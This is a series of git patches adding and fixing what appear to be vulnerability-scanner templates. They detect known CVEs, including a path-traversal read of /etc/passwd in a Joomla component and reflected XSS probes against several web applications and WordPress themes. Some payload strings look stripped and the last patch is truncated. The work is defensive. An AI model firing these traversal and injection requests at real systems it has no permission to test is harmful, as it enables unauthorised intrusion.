arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12235 + - https://www.cvedetails.com/cve/CVE-2010-1957 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 4340807fb623db6c6d3165fa17894f669280d941 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 09:56:03 +0700 Subject: [PATCH 2266/4083] Create CVE-2020-19282.yaml --- cves/2020/CVE-2020-19282.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-19282.yaml diff --git a/cves/2020/CVE-2020-19282.yaml b/cves/2020/CVE-2020-19282.yaml new file mode 100644 index 0000000000..97c4f30f76 --- /dev/null +++ b/cves/2020/CVE-2020-19282.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-19282 + +info: + name: Jeesns 1.4.2 XSS + author: pikpikcu + severity: medium + descreption: reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + reference: + - https://github.com/zchuanzhao/jeesns/issues/11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 + tags: cves,cve2020,jeesns,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/error?msg=%3CScript%3Eprompt(document.domain)%3C/Script%3E" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + + - type: word + words: + - '" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - 'Content-Type: text/html' + part: header From 796093ae5df86d2d5c19e44674cb0be5efd6338b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:26:23 +0700 Subject: [PATCH 2272/4083] Create CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-37833.yaml diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml new file mode 100644 index 0000000000..e720ad1081 --- /dev/null +++ b/cves/2021/CVE-2021-37833.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-37833 + +info: + name: Hotel Druid 3.0.2 XSS + author: pikpikcu + severity: medium + descreption: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + reference: + - https://github.com/dievus/CVE-2021-37833 + - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 + tags: cves,cve2021,hotel-druid,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17">e3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3">yql8b=1' + - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 4a10930690c92a3e8a779aa67cc209d00ce4f79c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:30:18 +0700 Subject: [PATCH 2273/4083] Update CVE-2020-19282.yaml --- cves/2020/CVE-2020-19282.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-19282.yaml b/cves/2020/CVE-2020-19282.yaml index 97c4f30f76..5feb200bef 100644 --- a/cves/2020/CVE-2020-19282.yaml +++ b/cves/2020/CVE-2020-19282.yaml @@ -4,7 +4,7 @@ info: name: Jeesns 1.4.2 XSS author: pikpikcu severity: medium - descreption: reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + description: reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. reference: - https://github.com/zchuanzhao/jeesns/issues/11 - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 From c5416951e5791d6fce34896a57a253a3d04163fd Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:30:38 +0700 Subject: [PATCH 2274/4083] Update CVE-2020-19283.yaml --- cves/2020/CVE-2020-19283.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-19283.yaml b/cves/2020/CVE-2020-19283.yaml index 68f69d7a73..81024c60e6 100644 --- a/cves/2020/CVE-2020-19283.yaml +++ b/cves/2020/CVE-2020-19283.yaml @@ -4,7 +4,7 @@ info: name: Jeesns newVersion Reflection XSS author: pikpikcu severity: medium - descreption: reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML. + description: reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML. reference: - https://github.com/zchuanzhao/jeesns/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2020-19283 From 1d63ebfe45fa28fc5dbb51080023650aab9fc265 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:30:58 +0700 Subject: [PATCH 2275/4083] Update CVE-2020-19295.yaml --- cves/2020/CVE-2020-19295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-19295.yaml b/cves/2020/CVE-2020-19295.yaml index 75d82c7f70..4c81f11efe 100644 --- a/cves/2020/CVE-2020-19295.yaml +++ b/cves/2020/CVE-2020-19295.yaml @@ -4,7 +4,7 @@ info: name: Jeesns Weibo Topic Reflection XSS author: pikpikcu severity: medium - descreption: reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + description: reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. reference: - https://github.com/zchuanzhao/jeesns/issues/21 - https://nvd.nist.gov/vuln/detail/CVE-2020-19295 From 3a2eacf6b92ad2467a07b2dce6d3f662333ae844 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:31:34 +0700 Subject: [PATCH 2276/4083] Update CVE-2018-12998.yaml --- cves/2018/CVE-2018-12998.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index 67b81eba21..fdc71f0e37 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml @@ -4,7 +4,7 @@ info: name: Zoho manageengine Arbitrary Reflected XSS author: pikpikcu severity: medium - descreption: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. reference: - https://github.com/unh3x/just4cve/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 From fde477de48b219c1d78853dd8981c2cc9e4e9edf Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:32:11 +0700 Subject: [PATCH 2277/4083] Update CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index e720ad1081..da7b18b64c 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml @@ -4,7 +4,7 @@ info: name: Hotel Druid 3.0.2 XSS author: pikpikcu severity: medium - descreption: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + description: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. reference: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 From 3ca80153b3056351663edcf48f3ba9511c98dcf1 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:36:38 +0700 Subject: [PATCH 2278/4083] Create CVE-2021-35265.yaml --- cves/2021/CVE-2021-35265.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2021/CVE-2021-35265.yaml diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml new file mode 100644 index 0000000000..bbdb198b8a --- /dev/null +++ b/cves/2021/CVE-2021-35265.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-35265 + +info: + name: MaxSite CMS XSS + author: pikpikcu + severity: medium + description: reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. + reference: + - https://github.com/maxsite/cms/issues/414#issue-726249183 + - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 + tags: cves,cve2021,maxsite,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' + - '{{BaseURL}}/maxsite/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' + + matchers-condition: and + matchers: + + - type: word + words: + - '">' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 04ab1bb769b7737e6b19b27f049934b1791550b0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:45:52 +0700 Subject: [PATCH 2279/4083] Create CVE-2021-24364.yaml --- cves/2021/CVE-2021-24364.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-24364.yaml diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml new file mode 100644 index 0000000000..f10ff32829 --- /dev/null +++ b/cves/2021/CVE-2021-24364.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-24364 + +info: + name: Jannah < 5.4.4 (XSS) + author: pikpikcu + severity: medium + description: he Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + reference: + - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 + tags: cves,cve2021,wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275\">%27%2C%27custom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 936ec94e23bf6ec502a509306070377418d001ee Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:51:50 +0700 Subject: [PATCH 2280/4083] Create CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-24407.yaml diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml new file mode 100644 index 0000000000..669cda4004 --- /dev/null +++ b/cves/2021/CVE-2021-24407.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-24407 + +info: + name: Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS) + author: pikpikcu + severity: medium + description: he Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability. + reference: + - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 + tags: cves,cve2021,wordpress,xss + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + action=tie_ajax_search&query[]= + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 643623211cee596ca12f77d2d72ae234eb81298b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:02:38 +0700 Subject: [PATCH 2281/4083] Create CVE-2021-24342.yaml --- cves/2021/CVE-2021-24342.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-24342.yaml diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml new file mode 100644 index 0000000000..e71b29702b --- /dev/null +++ b/cves/2021/CVE-2021-24342.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-24342 + +info: + name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS) + author: pikpikcu + severity: medium + description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue. + reference: + - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e + - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 + tags: cves,cve2021,wordpress,xss + +requests: + - raw: + - | + POST /?ajax-request=jnews HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 9cf31a5078e59bd4cbed3c9bb168eb357970db9c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:03:20 +0700 Subject: [PATCH 2282/4083] Update CVE-2021-24364.yaml --- cves/2021/CVE-2021-24364.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml index f10ff32829..8d02f10378 100644 --- a/cves/2021/CVE-2021-24364.yaml +++ b/cves/2021/CVE-2021-24364.yaml @@ -4,7 +4,7 @@ info: name: Jannah < 5.4.4 (XSS) author: pikpikcu severity: medium - description: he Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + description: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. reference: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 From 7a88129ee83a215f1207568294b97d617c3f12c3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:03:37 +0700 Subject: [PATCH 2283/4083] Update CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index 669cda4004..8d87b74364 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -4,7 +4,7 @@ info: name: Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS) author: pikpikcu severity: medium - description: he Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability. + description: The Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability. reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 @@ -18,7 +18,7 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - action=tie_ajax_search&query[]= + action=tie_ajax_search&query[]= matchers-condition: and matchers: From 88c319a1482eb17effe8915adea584128ddb2f32 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:04:51 +0700 Subject: [PATCH 2284/4083] Update CVE-2021-24342.yaml --- cves/2021/CVE-2021-24342.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index e71b29702b..2aaf4ec9f9 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -17,7 +17,7 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 matchers-condition: and From 468d4277e81c47584800bbea6269d177dd3750e0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:19:07 +0700 Subject: [PATCH 2285/4083] Create shopizer-detect.yaml --- technologies/shopizer-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/shopizer-detect.yaml diff --git a/technologies/shopizer-detect.yaml b/technologies/shopizer-detect.yaml new file mode 100644 index 0000000000..3989e78c19 --- /dev/null +++ b/technologies/shopizer-detect.yaml @@ -0,0 +1,23 @@ +id: shopizer-detect + +info: + name: Shopizer Detection + author: pikpikcu + severity: info + tags: tech,shopizer + +requests: + - method: GET + path: + - "{{BaseURL}}/shop/" + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Powered by Date: Wed, 15 Sep 2021 12:30:08 +0700 Subject: [PATCH 2286/4083] Create getsimple-cms-detect.yaml --- technologies/getsimple-cms-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/getsimple-cms-detect.yaml diff --git a/technologies/getsimple-cms-detect.yaml b/technologies/getsimple-cms-detect.yaml new file mode 100644 index 0000000000..175287a663 --- /dev/null +++ b/technologies/getsimple-cms-detect.yaml @@ -0,0 +1,22 @@ +id: getsimple-cms-detect + +info: + name: GetSimple CMS Detection + author: pikpikcu + severity: info + tags: tech,getsimple + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/index.php" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "GetSimple CMS" From bb8e0616e97ed2471010906361e7a686a4f084ff Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 13:00:51 +0700 Subject: [PATCH 2287/4083] Create CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2020/CVE-2020-24912.yaml diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml new file mode 100644 index 0000000000..6978460d19 --- /dev/null +++ b/cves/2020/CVE-2020-24912.yaml @@ -0,0 +1,38 @@ + +id: CVE-2020-24912 + +info: + name: QCube Cross-Site-Scripting + author: pikpikcu + severity: medium + description: reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + reference: + - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 + - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 + - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 + - http://seclists.org/fulldisclosure/2021/Mar/30 + tags: cves,cve2020,qcubed,xss + +requests: + - method: POST + path: + - "{{BaseURL}}/assets/_core/php/profile.php" + - "{{BaseURL}}/assets/php/profile.php" + - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + + matchers-condition: and + matchers: + + - type: word + words: + - 'strProfileData' + - "YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header From 80072c8e97dd7400ad8aa90114a250bac3519670 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 13:13:50 +0700 Subject: [PATCH 2288/4083] Create CVE-2020-28351.yaml --- cves/2020/CVE-2020-28351.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2020/CVE-2020-28351.yaml diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml new file mode 100644 index 0000000000..e83c29aa1b --- /dev/null +++ b/cves/2020/CVE-2020-28351.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-28351 + +info: + name: ShoreTel 19.46.1802.0 XSS + author: pikpikcu + severity: medium + description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page + reference: + - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 + tags: cves,cve2020,shoretel,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + + - type: word + words: + - 'onmouseover=alert(document.domain)' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header From bc6470a65a3cddcae2a03fea55341fa459f83d25 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 14:10:34 +0700 Subject: [PATCH 2289/4083] Create CVE-2019-13392.yaml --- cves/2019/CVE-2019-13392.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2019/CVE-2019-13392.yaml diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml new file mode 100644 index 0000000000..6f097447c2 --- /dev/null +++ b/cves/2019/CVE-2019-13392.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-13392 + +info: + name: MindPalette NateMail 3.0.15 - (XSS) + author: pikpikcu + severity: medium + description: reflected Cross-Site Scripting (XSS) vulnerability in MindPalette NateMail 3.0.15 allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid. + reference: + - https://www.doyler.net/security-not-included/natemail-vulnerabilities + - https://nvd.nist.gov/vuln/detail/CVE-2019-13392 + tags: cves,cve2019,natemail,xss + +requests: + - raw: + - | + POST /NateMail.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + recipient=%3cscript%3ealert(document.domain)%3c%2fscript%3e + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From d89b82f8102e85b06dab9272a474e85e5cbddebb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 14:35:51 +0530 Subject: [PATCH 2290/4083] Update CVE-2021-24342.yaml --- cves/2021/CVE-2021-24342.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index 2aaf4ec9f9..6a8299a894 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 - tags: cves,cve2021,wordpress,xss + tags: cves,cve2021,wordpress,xss,wp-plugin requests: - raw: @@ -18,14 +18,14 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word From 1a50ce7b865700967e3801c7c9c7dec990e706f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 14:39:45 +0530 Subject: [PATCH 2291/4083] Update shopizer-detect.yaml --- technologies/shopizer-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/shopizer-detect.yaml b/technologies/shopizer-detect.yaml index 3989e78c19..76636075ff 100644 --- a/technologies/shopizer-detect.yaml +++ b/technologies/shopizer-detect.yaml @@ -9,8 +9,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/shop/" - "{{BaseURL}}" + - "{{BaseURL}}/shop/" matchers-condition: and matchers: @@ -21,3 +21,4 @@ requests: - type: word words: - 'Powered by Date: Wed, 15 Sep 2021 17:31:01 +0700 Subject: [PATCH 2292/4083] Create CVE-2016-1000141.yaml --- cves/2016/CVE-2016-1000141.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000141.yaml diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml new file mode 100644 index 0000000000..c02f8e592a --- /dev/null +++ b/cves/2016/CVE-2016-1000141.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000141 + +info: + name: MiniMax <= 2.0.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - 